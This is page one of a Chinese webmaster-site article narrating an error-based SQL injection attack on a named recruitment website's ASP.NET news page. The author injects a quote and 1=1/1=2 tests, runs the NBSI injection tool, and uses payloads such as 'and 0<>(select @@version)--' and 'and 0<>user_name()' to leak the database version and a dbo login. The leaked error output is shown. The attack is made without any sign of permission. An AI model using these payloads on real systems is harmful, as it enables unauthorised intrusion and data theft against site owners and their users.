文章投稿 | 加入收藏 | 繁體中文
网站首页 | 站长之家 | 业界新闻 | 网站运营 | 联盟资讯 | IDC资讯 | 免费资源 | 站长学院 | 站长工具 | 站长手册 | 站长论坛
┫当前位置:网站首页 > 网站运营 > 网站安全 > ASP.net网站攻击实例 > 正文

ASP.net网站攻击实例

作者:未知  来源:本站整理  时间:2008-3-17 17:17:07  点击:  字体:
今天上了一个人才招聘网站,对他们的招聘系统我很感兴趣,aspx结尾的,看来是.net的程序,这样的网站会不会有什么漏洞呢?顺便打开一条消息 http://www.cnwill.com/NewsShow.aspx?id=4847 ,然后加一个' 看看出现什么?

Source: .Net SqlClient Data Provider

Description: 字符串 '' 之前有未闭合的引号。www.id89.com

TargeSite: System.Data.SqlClient.SqlDataReader ExecuteReader(System.Data.CommandBehavior, System.Data.SqlClient.RunBehavior, Boolean)

似乎有可能,然后 1=1 正常 1=2出错。。这和asp的似乎没有区别阿。。于是把NBSI挂上了,竟然也可以猜出表名来,和ASP没区别。不过NBSI不认识这里的出错信息,只能按照没有提示的方式破。。先暂停一下NBSI,输入

http://www.cnwill.com/NewsShow.aspx?id=4844%20and%200<;>(select%20@@version)--

提示:

Source: .Net SqlClient Data Provider

Description: 将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。

TargeSite: Boolean Read()

是个2000的Enterprise server而且SP4了。。然后

_name">http://www.cnwill.com/NewsShow.aspx?id=4844%20and%200<;>user_name()

提示:

Source: .Net SqlClient Data Provider

Description: 将 nvarchar 值 'dbo' 转换为数据类型为 int 的列时发生语法错误。

TargeSite: Boolean Read()

哦?用dbo的身份连接?应该有搞头。。

[1] [2] 下一页

热门排行
精彩推荐
     下一篇文章:
文章评论
昵 称:    验证码:
内 容:
 
关于我们 - 公司动态 - 联系我们 - 友情链接 - 广告服务 - 版权声明 - 网站地图 - 网站帮助
Copyright © 2003-2009 ID89.COM All Rights Reserved
备案/许可证编号:粤ICP备08035961号